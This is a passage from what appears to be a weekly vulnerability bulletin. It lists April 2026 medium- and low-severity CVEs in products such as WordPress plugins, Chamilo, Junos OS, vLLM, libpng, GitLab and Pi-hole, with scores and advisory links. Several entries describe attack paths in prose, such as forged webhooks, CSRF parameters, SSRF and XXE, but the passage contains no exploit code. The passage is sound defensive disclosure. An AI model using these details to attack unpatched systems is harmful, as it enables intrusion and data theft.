created by other users. Attackers can access the /api/v1/tasks and /api/v1= /tasks/{task_id} routes without authentication to expose task type, task st= atus, resource identifiers, archive URIs, result payloads, and error inform= ation, potentially causing cross-tenant interference in multi-tenant deploy= ments. 2026-04-07 5.3 CVE-2026-22680 [ https://www.cve.org/CVERecord?id=3DC= VE-2026-22680 ] https://github.com/volcengine/OpenViking/releases/tag/v0.3.3 https://github.com/volcengine/OpenViking/pull/1182 https://github.com/volcengine/OpenViking/commit/8c1c3f3608364ee0bb0e45f7347= 8771a68aebdf5 https://www.vulncheck.com/advisories/openviking-missing-authorization-via-t= ask-polling
=C2=A0 HDFGroup--hdf5 HDF5 is software for managing data. In 1.14.1-2 and e= arlier, an attacker who can control an h5 file parsed by HDF5 can trigger a=
write-based heap buffer overflow condition in the H5T__ref_mem_setnull met= hod. This can lead to a denial-of-service condition, and potentially furthe=
r issues such as remote code execution depending on the practical exploitab= ility of the heap overflow against modern operating systems. 2026-04-10 5.5=
CVE-2026-29043 [ https://www.cve.org/CVERecord?id=3DCVE-2026-29043 ] https= ://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5g5w-2277
=C2=A0 smub--Charitable Donation Plugin for WordPress Fundraising with Recu= rring Donations & More The Charitable - Donation Plugin for WordPress - Fun= draising with Recurring Donations & More plugin for WordPress is vulnerable=
to Insufficient Verification of Data Authenticity in versions up to, and i= ncluding, 1.8.9.7. This is due to missing cryptographic verification of inc= oming Stripe webhook events. This makes it possible for unauthenticated att= ackers to forge payment_intent.succeeded webhook payloads and mark pending = donations as completed without a real payment. 2026-04-07 5.3 CVE-2026-3177=
[ https://www.cve.org/CVERecord?id=3DCVE-2026-3177 ] https://www.wordfence= .com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?s= ource=3Dcve
https://plugins.trac.wordpress.org/changeset/3485023/charitable
=C2=A0 Red Hat--mirror registry for Red Hat OpenShift A flaw was found in R=
ed Hat Quay's Proxy Cache configuration feature. When an organization admin= istrator configures an upstream registry for proxy caching, Quay makes a ne= twork connection to the specified registry hostname without verifying that =
it points to a legitimate external service. An attacker with organization a= dministrator privileges could supply a crafted hostname to force the Quay s= erver to make requests to internal network services, cloud infrastructure e= ndpoints, or other resources that should not be accessible from the Quay ap= plication. 2026-04-08 5.2 CVE-2026-32591 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-32591 ] https://access.redhat.com/security/cve/CVE-2026-32591 RHBZ#2446965 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2446965 ]
=C2=A0 opensourcepos--opensourcepos Open Source Point of Sale is a web base=
d point-of-sale application written in PHP using CodeIgniter framework. Pri=
or to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in th=
e Daily Sales management table. The customer_name column is configured with=
escape: false in the bootstrap-table column configuration, causing custome=
r names to be rendered as raw HTML. An attacker with customer management pe= rmissions can inject arbitrary JavaScript into a customer's first_name or l= ast_name field, which executes in the browser of any user viewing the Daily=
Sales page. This vulnerability is fixed in 3.4.3. 2026-04-07 5.4 CVE-2026-= 32712 [ https://www.cve.org/CVERecord?id=3DCVE-2026-32712 ] https://github.= com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 2.0.0-RC.3, a Reflected Cross-Site Scripting (XSS) vulnerability in = the exercise question list admin panel allows an attacker to execute arbitr= ary JavaScript in an authenticated teacher's browser. The pagination code m= erges all $_GET parameters via array_merge() and outputs the result via htt= p_build_query() directly into HTML href attributes without htmlspecialchars=
() encoding. This vulnerability is fixed in 2.0.0-RC.3. 2026-04-10 5.4 CVE-= 2026-32893 [ https://www.cve.org/CVERecord?id=3DCVE-2026-32893 ] https://gi= thub.com/chamilo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc https://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf04= 78857592276
=C2=A0 Microsoft--Microsoft Edge for Android User interface (ui) misreprese= ntation of critical information in Microsoft Edge (Chromium-based) allows a=
n unauthorized attacker to perform spoofing over a network. 2026-04-10 5.4 = CVE-2026-33119 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33119 ] Micros= oft Edge (Chromium-based) for Android Spoofing Vulnerability [ https://msrc= .microsoft.com/update-guide/vulnerability/CVE-2026-33119 ]
=C2=A0 pi-hole--web Pi-hole Admin Interface is a web interface for managing=
Pi-hole, a network-level ad and internet tracker blocking application. Fro=
m 6.0 to before 6.5, configuration values from the /api/config endpoint are=
placed directly into HTML value=3D"" attributes without escaping in settin= gs-advanced.js, enabling HTML attribute injection. A double quote in any co= nfig value breaks out of the attribute context. JavaScript execution is blo= cked by the server's CSP (script-src 'self'), but injected attributes can a= lter element styling for UI redressing. The primary attack vector is import= ing a malicious teleporter backup, which bypasses per-field server-side val= idation. This vulnerability is fixed in 6.5. 2026-04-06 5.4 CVE-2026-33406 =
[ https://www.cve.org/CVERecord?id=3DCVE-2026-33406 ] https://github.com/pi= -hole/web/security/advisories/GHSA-9rfm-c5g6-538p
=C2=A0 themeum--Tutor LMS eLearning and online course solution The Tutor LM=
S - eLearning and online course solution plugin for WordPress is vulnerable=
to unauthorized private course enrollment in all versions up to, and inclu= ding, 3.9.7. This is due to missing post_status validation in the `enroll_n= ow()` and `course_enrollment()` functions. Both enrollment endpoints verify=
the nonce, user authentication, and whether the course is purchasable, but=
fail to check if the course has a `private` post_status. This makes it pos= sible for authenticated attackers with Subscriber-level access or above to = enroll in private courses by sending a crafted POST request with the target=
course ID. The enrollment record is created in the database and the privat=
e course title and enrollment status are exposed in the subscriber's dashbo= ard, though WordPress core access control prevents the subscriber from view= ing the actual course content (returns 404). Enrollment in private courses = should be restricted to users with the `read_private_posts` capability. 202= 6-04-11 5.4 CVE-2026-3358 [ https://www.cve.org/CVERecord?id=3DCVE-2026-335=
8 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-7228= -4253-bb28-2c2e11af76fd?source=3Dcve https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.= php#L2066 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.= php#L134 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L= 2053 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L= 2989 https://plugins.trac.wordpress.org/changeset?old_path=3D%2Ftutor/tags/3.9.7= &new_path=3D%2Ftutor/tags/3.9.8 https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classes/Co= urse.php
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38, Twig template files (.tpl) under /main/template/default/ ar=
e directly accessible without authentication via HTTP GET requests. These t= emplates expose internal application logic, variable names, AJAX endpoint U= RLs, and admin panel structure. This vulnerability is fixed in 1.11.38. 202= 6-04-10 5.3 CVE-2026-33705 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33= 705 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-= 8x28-px57 https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef= 7b98db17bff
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, multiple files use simplexml_load_string() w= ithout XXE protection. With LIBXML_NOENT flag, arbitrary server files can b=
e read. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 5=
.3 CVE-2026-33737 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33737 ] htt= ps://github.com/chamilo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j https://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155ab= a27070c927e https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2ea= d0d00cacaa3
=C2=A0 Juniper Networks--Junos OS An Incorrect Initialization of Resource v= ulnerability in the packet forwarding engine (pfe) of Juniper Networks Juno=
s OS on specific EX Series and QFX Series device allows an unauthenticated,=
network-based attacker to cause an integrity impact to downstream networks=
. When the same family inet or inet6 filter is applied on an IRB interface = and on a physical interface as egress filter on EX4100, EX4400, EX4650 and = QFX5120 devices, only one of the two filters will be applied, which can lea=
d to traffic being sent out one of these interfaces which should have been = blocked. This issue affects Junos OS on EX Series and QFX Series: * 23.4 ve= rsion 23.4R2-S6, * 24.2 version 24.2R2-S3. No other Junos OS versions are a= ffected. 2026-04-09 5.8 CVE-2026-33773 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-33773 ] https://kb.juniper.net/JSA107815
=C2=A0 Juniper Networks--Junos OS A Missing Authorization vulnerability in = the CLI of Juniper Networks Junos OS and Junos OS Evolved allows a local us=
er with low privileges to read sensitive information. A local user with low=
privileges can execute the CLI command 'show mgd' with specific arguments = which will expose sensitive information. This issue affects Junos OS: * all=
versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S6, * 23.4 versio=
ns before 23.4R2-S6, * 24.2 versions before 24.2R2-S4, * 24.4 versions befo=
re 24.4R2-S1, * 25.2 version before 25.2R1-S2, 25.2R2; Junos OS Evolved: * = all versions before 23.2R2-S6-EVO, * 23.4 version before 23.4R2-S6-EVO, * 2= 4.2 version before 24.2R2-S4-EVO, * 24.4 versions before 24.4R2-S1-EVO, * 2= 5.2 versions before 25.2R2-EVO. 2026-04-09 5.5 CVE-2026-33776 [ https://www= .cve.org/CVERecord?id=3DCVE-2026-33776 ] https://kb.juniper.net/JSA107866 =C2=A0 Juniper Networks--Junos OS An Improper Check for Unusual or Exceptio= nal Conditions vulnerability in the chassis control daemon (chassisd) of Ju= niper Networks Junos OS on SRX1600, SRX2300 and SRX4300 allows a local atta= cker with low privileges to cause a complete Denial of Service (DoS). When =
a specific 'show chassis' CLI command is executed, chassisd crashes and res= tarts which causes a momentary impact to all traffic until all modules are = online again. This issue affects Junos OS on SRX1600, SRX2300 and SRX4300: =
* 24.4 versions before 24.4R1-S3, 24.4R2. This issue does not affect Junos =
OS versions before 24.4R1. 2026-04-09 5.5 CVE-2026-33786 [ https://www.cve.= org/CVERecord?id=3DCVE-2026-33786 ] https://kb.juniper.net/JSA107810
=C2=A0 Juniper Networks--Junos OS An Improper Check for Unusual or Exceptio= nal Conditions vulnerability in the chassis control daemon (chassisd) of Ju= niper Networks Junos OS on SRX1500, SRX4100, SRX4200 and SRX4600 allows a l= ocal attacker with low privileges to cause a complete Denial of Service (Do= S). When a specific 'show chassis' CLI command is executed, chassisd crashe=
s and restarts which causes a momentary impact to all traffic until all mod= ules are online again. This issue affects Junos OS on SRX1500, SRX4100, SRX= 4200 and SRX4600:=C2=A0 * 23.2 versions before=C2=A023.2R2-S6, * 23.4 versi= ons before=C2=A023.4R2-S7 * 24.2 versions before 24.2R2-S2, * 24.4 versions=
before 24.4R2, * 25.2 versions before 25.2R1-S1, 25.2R2. 2026-04-09 5.5 CV= E-2026-33787 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33787 ] https://= kb.juniper.net/JSA107873
=C2=A0 AcademySoftwareFoundation--openexr OpenEXR provides the specificatio=
n and reference implementation of the EXR file format, an image storage for= mat for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and=
3.4.9, a signed integer overflow exists in undo_pxr24_impl() in src/lib/Op= enEXRCore/internal_pxr24.c at line 377. The expression (uint64_t)(w * 3) co= mputes w * 3 as a signed 32-bit integer before casting to uint64_t. When w =
is large, this multiplication constitutes undefined behavior under the C st= andard. On tested builds (clang/gcc without sanitizers), two's-complement w= raparound commonly occurs, and for specific values of w the wrapped result =
is a small positive integer, which may allow the subsequent bounds check to=
pass incorrectly. If the check is bypassed, the decoding loop proceeds to = write pixel data through dout, potentially extending far beyond the allocat=
ed output buffer. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. 2= 026-04-06 5.9 CVE-2026-34380 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 34380 ] https://github.com/AcademySoftwareFoundation/openexr/security/advis= ories/GHSA-q3v8-hw4m-59w5 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9
=C2=A0 vllm-project--vllm vLLM is an inference and serving engine for large=
language models (LLMs). From 0.16.0 to before 0.19.0, a server-side reques=
t forgery (SSRF) vulnerability in download_bytes_from_url allows any actor = who can control batch input JSON to make the vLLM batch runner issue arbitr= ary HTTP/HTTPS requests from the server, without any URL validation or doma=
in restrictions. This can be used to target internal services (e.g. cloud m= etadata endpoints or internal HTTP APIs) reachable from the vLLM host. This=
vulnerability is fixed in 0.19.0. 2026-04-06 5.4 CVE-2026-34753 [ https://= www.cve.org/CVERecord?id=3DCVE-2026-34753 ] https://github.com/vllm-project= /vllm/security/advisories/GHSA-pf3h-qjgv-vcpr
=C2=A0 pnggroup--libpng LIBPNG is a reference library for use in applicatio=
ns that read, create, and manipulate PNG (Portable Network Graphics) raster=
image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from = png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding set= ter on the same png_struct/png_info pair causes the setter to read from fre=
ed memory and copy its contents into the replacement buffer. The setter fre=
es the internal buffer before copying from the caller-supplied pointer, whi=
ch now dangles. The freed region may contain stale data (producing silently=
corrupted chunk metadata) or data from subsequent heap allocations (leakin=
g unrelated heap contents into the chunk struct). This vulnerability is fix=
ed in 1.6.57. 2026-04-09 5.1 CVE-2026-34757 [ https://www.cve.org/CVERecord= ?id=3DCVE-2026-34757 ] https://github.com/pnggroup/libpng/security/advisori= es/GHSA-6fr7-g8h7-v645
https://github.com/pnggroup/libpng/issues/836 https://github.com/pnggroup/libpng/issues/837 https://github.com/pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde= 3684e8a https://github.com/pnggroup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b= 48c6bcc
=C2=A0 projectzealous01--PZ Frontend Manager The PZ Frontend Manager plugin=
for WordPress is vulnerable to Missing Authorization in all versions up to=
and including 1.0.6. The pzfm_user_request_action_callback() function, reg= istered via the wp_ajax_pzfm_user_request_action action hook, lacks both ca= pability checks and nonce verification. This function handles user activati= on, deactivation, and deletion operations. When the 'dataType' parameter is=
set to 'delete', the function calls wp_delete_user() on all provided user = IDs without verifying that the current user has the appropriate permissions=
. Notably, the similar pzfm_remove_item_callback() function does check pzfm= _can_delete_user() before performing deletions, indicating this was an over= sight. This makes it possible for authenticated attackers, with Subscriber-= level access and above, to delete arbitrary WordPress users (including admi= nistrators) by sending a crafted request to the AJAX endpoint. 2026-04-08 5=
.3 CVE-2026-3477 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3477 ] https= ://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e345-b549-493b-a84= b-abe56ab42a04?source=3Dcve https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/= includes/ajax-hooks.php#L331 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/a= dmin/includes/ajax-hooks.php#L331 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/= includes/ajax-hooks.php#L292 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/a= dmin/includes/ajax-hooks.php#L292 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/trunk/admin/= includes/ajax-hooks.php#L290 https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags/1.0.6/a= dmin/includes/ajax-hooks.php#L290
=C2=A0 Eniture technology--LTL Freight Quotes Worldwide Express Edition Mis= sing Authorization vulnerability in Eniture technology LTL Freight Quotes -=
Worldwide Express Edition allows Exploiting Incorrectly Configured Access = Control Security Levels.This issue affects LTL Freight Quotes - Worldwide E= xpress Edition: from n/a through 5.2.1. 2026-04-07 5.3 CVE-2026-34899 [ htt= ps://www.cve.org/CVERecord?id=3DCVE-2026-34899 ] https://patchstack.com/dat= abase/wordpress/plugin/ltl-freight-quotes-worldwide-express-edition/vulnera= bility/wordpress-ltl-freight-quotes-worldwide-express-edition-plugin-5-2-1-= broken-access-control-vulnerability?_s_id=3Dcve
=C2=A0 OceanWP--Ocean Extra Missing Authorization vulnerability in OceanWP = Ocean Extra allows Exploiting Incorrectly Configured Access Control Securit=
y Levels.This issue affects Ocean Extra: from n/a through 2.5.3. 2026-04-07=
5.4 CVE-2026-34903 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34903 ] h= ttps://patchstack.com/database/wordpress/plugin/ocean-extra/vulnerability/w= ordpress-ocean-extra-plugin-2-5-3-broken-access-control-vulnerability?_s_id= =3Dcve
=C2=A0 Heatmiser--Heatmiser Wifi Thermostat Heatmiser Wifi Thermostat 1.7 c= ontains a cross-site request forgery vulnerability that allows attackers to=
change administrator credentials by tricking authenticated users into subm= itting malicious requests. Attackers can craft HTML forms targeting the net= workSetup.htm endpoint with parameters usnm, usps, and cfps to modify the a= dmin username and password without user consent. 2026-04-12 4.3 CVE-2019-25= 708 [ https://www.cve.org/CVERecord?id=3DCVE-2019-25708 ] ExploitDB-46100 [=
https://www.exploit-db.com/exploits/46100 ]
VulnCheck Advisory: Heatmiser Wifi Thermostat 1.7 Cross-Site Request Forger=
y [ https://www.vulncheck.com/advisories/heatmiser-wifi-thermostat-cross-si= te-request-forgery ]
=C2=A0 GitLab--GitLab GitLab has remediated an issue in GitLab EE affecting=
all versions from 16.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before=
18.10.3 that under certain circumstances could have allowed an authenticat=
ed user to have access to other users' email addresses via certain GraphQL = queries. 2026-04-08 4.3 CVE-2025-9484 [ https://www.cve.org/CVERecord?id=3D= CVE-2025-9484 ] GitLab Issue #565363 [ https://gitlab.com/gitlab-org/gitlab= /-/issues/565363 ]
HackerOne Bug Bounty Report #3303810 [ https://hackerone.com/reports/330381=
0 ] https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r= eleased/
=C2=A0 vsourz1td--Advanced Contact form 7 DB The Advanced Contact form 7 DB=
plugin for WordPress is vulnerable to unauthorized access of data due to a=
missing capability check on the 'vsz_cf7_export_to_excel' function in all = versions up to, and including, 2.0.9. This makes it possible for authentica= ted attackers, with Subscriber-level access and above, to export form submi= ssions to excel file. 2026-04-08 4.3 CVE-2026-0814 [ https://www.cve.org/CV= ERecord?id=3DCVE-2026-0814 ] https://www.wordfence.com/threat-intel/vulnera= bilities/id/5e3de1a4-a534-475b-9138-2337755b0288?source=3Dcve https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin= /class-advanced-cf7-db-admin.php#L1507 https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db
=C2=A0 realmag777--BEAR Bulk Editor and Products Manager Professional for W= ooCommerce by Pluginus.Net The BEAR - Bulk Editor and Products Manager Prof= essional for WooCommerce by Pluginus.Net plugin for WordPress is vulnerable=
to Cross-Site Request Forgery in all versions up to, and including, 1.1.5.=
This is due to missing nonce validation on the woobe_delete_tax_term() fun= ction. This makes it possible for unauthenticated attackers to delete WooCo= mmerce taxonomy terms (categories, tags, etc.) via a forged request granted=
they can trick a site administrator or shop manager into performing an act= ion such as clicking on a link. 2026-04-08 4.3 CVE-2026-1673 [ https://www.= cve.org/CVERecord?id=3DCVE-2026-1673 ] https://www.wordfence.com/threat-int= el/vulnerabilities/id/1e4e8960-b0c1-4dbb-ba97-e45b88fb06c0?source=3Dcve https://plugins.trac.wordpress.org/browser/woo-bulk-editor/trunk/index.php#= L1474
https://plugins.trac.wordpress.org/changeset/3457263/ https://plugins.trac.wordpress.org/changeset/3465138/
=C2=A0 GitLab--GitLab GitLab has remediated an issue in GitLab EE affecting=
all versions from 11.3 before 18.8.9, 18.9 before 18.9.5, and 18.10 before=
18.10.3 that could have allowed an authenticated user with developer-role = permissions to modify protected environment settings due to improper author= ization checks in the API. 2026-04-08 4.3 CVE-2026-1752 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-1752 ] HackerOne Bug Bounty Report #3533545 [ ht= tps://hackerone.com/reports/3533545 ] https://gitlab.com/gitlab-org/gitlab/-/work_items/588413 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r= eleased/
=C2=A0 arubadev--Aruba HiSpeed Cache The Aruba HiSpeed Cache plugin for Wor= dPress is vulnerable to Cross-Site Request Forgery in all versions up to, a=
nd including, 3.0.4. This is due to missing nonce verification on the `ahsc= _ajax_reset_options()` function. This makes it possible for unauthenticated=
attackers to reset all plugin settings to their default values via a forge=
d request granted they can trick a site administrator into performing an ac= tion such as clicking on a link. 2026-04-10 4.3 CVE-2026-1924 [ https://www= .cve.org/CVERecord?id=3DCVE-2026-1924 ] https://www.wordfence.com/threat-in= tel/vulnerabilities/id/d2230151-fde2-43d6-8bff-0d2ffd559ab3?source=3Dcve https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/a= ruba-hispeed-cache.php#L632 https://plugins.trac.wordpress.org/browser/aruba-hispeed-cache/tags/3.0.4/a= ruba-hispeed-cache.php#L631 https://plugins.trac.wordpress.org/changeset?old_path=3D%2Faruba-hispeed-ca= che/tags/3.0.4&new_path=3D%2Faruba-hispeed-cache/tags/3.0.5
=C2=A0 GitLab--GitLab GitLab has remediated an issue in GitLab CE/EE affect= ing all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 bef= ore 18.10.3 that could have allowed an authenticated user to access confide= ntial issues assigned to other users via CSV export due to insufficient aut= horization checks. 2026-04-08 4.3 CVE-2026-2104 [ https://www.cve.org/CVERe= cord?id=3DCVE-2026-2104 ] HackerOne Bug Bounty Report #3541476 [ https://ha= ckerone.com/reports/3541476 ] https://gitlab.com/gitlab-org/gitlab/-/work_items/589021 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r= eleased/
=C2=A0 idealwebdesignlk--Whole Enquiry Cart for WooCommerce The Whole Enqui=
ry Cart for WooCommerce plugin for WordPress is vulnerable to Stored Cross-= Site Scripting via the 'woowhole_success_msg' parameter in all versions up = to, and including, 1.2.1 due to insufficient input sanitization and output = escaping. This makes it possible for authenticated attackers, with administ= rator-level access, to inject arbitrary web scripts in pages that will exec= ute whenever a user accesses an injected page. This only affects multi-site=
installations and installations where unfiltered_html has been disabled. 2= 026-04-08 4.4 CVE-2026-2838 [ https://www.cve.org/CVERecord?id=3DCVE-2026-2= 838 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc14a98-1d= f8-480b-bae3-5ec057b498af?source=3Dcve https://plugins.trac.wordpress.org/browser/whole-cart-enquiry/trunk/admin.p= hp#L53
=C2=A0 homarr-labs--homarr Homarr is an open-source dashboard. Prior to 1.5= 7.0, the user registration endpoint (/api/trpc/user.register) is vulnerable=
to a race condition that allows an attacker to create multiple user accoun=
ts from a single-use invite token. The registration flow performs three seq= uential database operations without a transaction: CHECK, CREATE, and DELET=
E. Because these operations are not atomic, concurrent requests can all pas=
s the validation step (1) before any of them reaches the deletion step (3).=
This allows multiple accounts to be registered using a single invite token=
that was intended to be single-use. This vulnerability is fixed in 1.57.0.=
2026-04-06 4.2 CVE-2026-32602 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-32602 ] https://github.com/homarr-labs/homarr/security/advisories/GHSA-vf= w3-53q9-2hp8
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, an Open Redirect vulnerability in the sessio=
n course edit page allows an attacker to redirect an authenticated administ= rator to an arbitrary external URL after saving coach assignment changes. T=
he redirect also leaks the id_session parameter to the attacker's server. T= his vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 4.7 CVE-20= 26-32932 [ https://www.cve.org/CVERecord?id=3DCVE-2026-32932 ] https://gith= ub.com/chamilo/chamilo-lms/security/advisories/GHSA-q2cp-3qj3-wx8q https://github.com/chamilo/chamilo-lms/commit/b005b3d3e76cf6eafc03e15ac445c= eff089551c0 https://github.com/chamilo/chamilo-lms/commit/fbd8d7eb37d05ec974293f05b6ffa= af9102ebd2b
=C2=A0 Microsoft--Microsoft Edge (Chromium-based) Microsoft Edge (Chromium-= based) Spoofing Vulnerability 2026-04-10 4.3 CVE-2026-33118 [ https://www.c= ve.org/CVERecord?id=3DCVE-2026-33118 ] Microsoft Edge (Chromium-based) Spoo= fing Vulnerability [ https://msrc.microsoft.com/update-guide/vulnerability/= CVE-2026-33118 ]
=C2=A0 Elastic--Kibana Incorrect Authorization (CWE-863) in Kibana can lead=
to cross-space information disclosure via Privilege Abuse (CAPEC-122). A u= ser with Fleet agent management privileges in one Kibana space can retrieve=
Fleet Server policy details from other spaces through an internal enrollme=
nt endpoint. The endpoint bypasses space-scoped access controls by using an=
unscoped internal client, returning operational identifiers, policy names,=
management state, and infrastructure linkage details from spaces the user =
is not authorized to access. 2026-04-08 4.3 CVE-2026-33460 [ https://www.cv= e.org/CVERecord?id=3DCVE-2026-33460 ] https://discuss.elastic.co/t/kibana-8= -19-14-9-2-8-9-3-3-security-update-esa-2026-25/385813
=C2=A0 themeum--Tutor LMS eLearning and online course solution The Tutor LM=
S - eLearning and online course solution plugin for WordPress is vulnerable=
to Insecure Direct Object Reference in all versions up to, and including, = 3.9.7. This is due to missing authorization checks in the `save_course_cont= ent_order()` private method, which is called unconditionally by the `tutor_= update_course_content_order` AJAX handler. While the handler's `content_par= ent` branch includes a `can_user_manage()` check, the `save_course_content_= order()` call processes attacker-supplied `tutor_topics_lessons_sorting` JS=
ON without any ownership or capability verification. This makes it possible=
for authenticated attackers with Subscriber-level access or above to detac=
h lessons from topics, reorder course content, and reassign lessons between=
topics in any course, including admin-owned courses, by sending a crafted = AJAX request with manipulated topic and lesson IDs. 2026-04-11 4.3 CVE-2026= -3371 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3371 ] https://www.word= fence.com/threat-intel/vulnerabilities/id/f9cf0430-8577-449a-aefe-d7bf606fe= 2de?source=3Dcve https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L= 1687 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L= 1755 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L= 252 https://plugins.trac.wordpress.org/changeset?old_path=3D%2Ftutor/tags/3.9.7= &new_path=3D%2Ftutor/tags/3.9.8
=C2=A0=20

Back to top [ #top ]

Low Vulnerabilities

Primary
Vendor -- Product Description Published CVSS Score Source Info Patch Info M= attermost--Mattermost Mattermost Plugins versions <=3D2.3.1 fail to limit t=
he request body size on the {{/lifecycle}} webhook endpoint which allows an=
authenticated attacker to cause memory exhaustion and denial of service vi=
a sending an oversized JSON payload. Mattermost Advisory ID: MMSA-2026-0061=
0 2026-04-09 3.7 CVE-2026-21388 [ https://www.cve.org/CVERecord?id=3DCVE-20= 26-21388 ] MMSA-2026-00610 [ https://mattermost.com/security-updates ]
=C2=A0 Dell--PowerProtect Agent Dell PowerProtect Agent Service, version(s)=
prior to 20.1, contain(s) an Incorrect Permission Assignment for Critical = Resource vulnerability. A low privileged attacker with local access could p= otentially exploit this vulnerability, leading to Information exposure. 202= 6-04-08 3.3 CVE-2026-28264 [ https://www.cve.org/CVERecord?id=3DCVE-2026-28= 264 ] https://www.dell.com/support/kbdoc/en-us/000447277/dsa-2026-158-secur= ity-update-dell-powerprotect-data-manager-for-multiple-security-vulnerabili= ties
=C2=A0 pi-hole--web Pi-hole Admin Interface is a web interface for managing=
Pi-hole, a network-level ad and internet tracker blocking application. Fro=
m 6.0 to before 6.5, client hostnames and IP addresses from the FTL databas=
e are rendered into the DOM without escaping in network.js (Network page) a=
nd charts.js/index.js (Dashboard chart tooltips). While upstream validation=
in dnsmasq and FTL blocks HTML characters via normal DHCP/DNS paths, the w=
eb UI performs no output escaping - an inconsistency with other fields in t=
he same file that are properly escaped. This vulnerability is fixed in 6.5.=
2026-04-06 3.4 CVE-2026-33404 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-33404 ] https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85wp= -ww9v
=C2=A0 pi-hole--web Pi-hole Admin Interface is a web interface for managing=
Pi-hole, a network-level ad and internet tracker blocking application. Fro=
m 6.0 to before 6.5, the formatInfo() function in queries.js renders data.u= pstream, data.client.ip, and data.ede.text into HTML without escaping when =
a user expands a query row in the Query Log, enabling stored HTML injection=
. JavaScript execution is blocked by the server's CSP (script-src 'self'). = The same fields are properly escaped in the table view (rowCallback), confi= rming the omission was an oversight. This vulnerability is fixed in 6.5. 20= 26-04-06 3.1 CVE-2026-33405 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3= 3405 ] https://github.com/pi-hole/web/security/advisories/GHSA-jx8x-mj2r-62=
vq
=C2=A0 OpenStack--Keystone An issue was discovered in OpenStack Keystone 14=
through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted applicati=
on credentials can create EC2 credentials. By using a restricted applicatio=
n credential to call the EC2 credential creation API, an authenticated user=
with only a reader role may obtain an EC2/S3 credential that carries the f= ull set of the parent user's S3 permissions, effectively bypassing the role=
restrictions imposed on the application credential. Only deployments that = use restricted application credentials in combination with the EC2/S3 compa= tibility API (swift3 / s3api) are affected. 2026-04-10 3.5 CVE-2026-33551 [=
https://www.cve.org/CVERecord?id=3DCVE-2026-33551 ] https://bugs.launchpad= .net/keystone/+bug/2142138 https://security.openstack.org/ossa/OSSA-2026-005.html
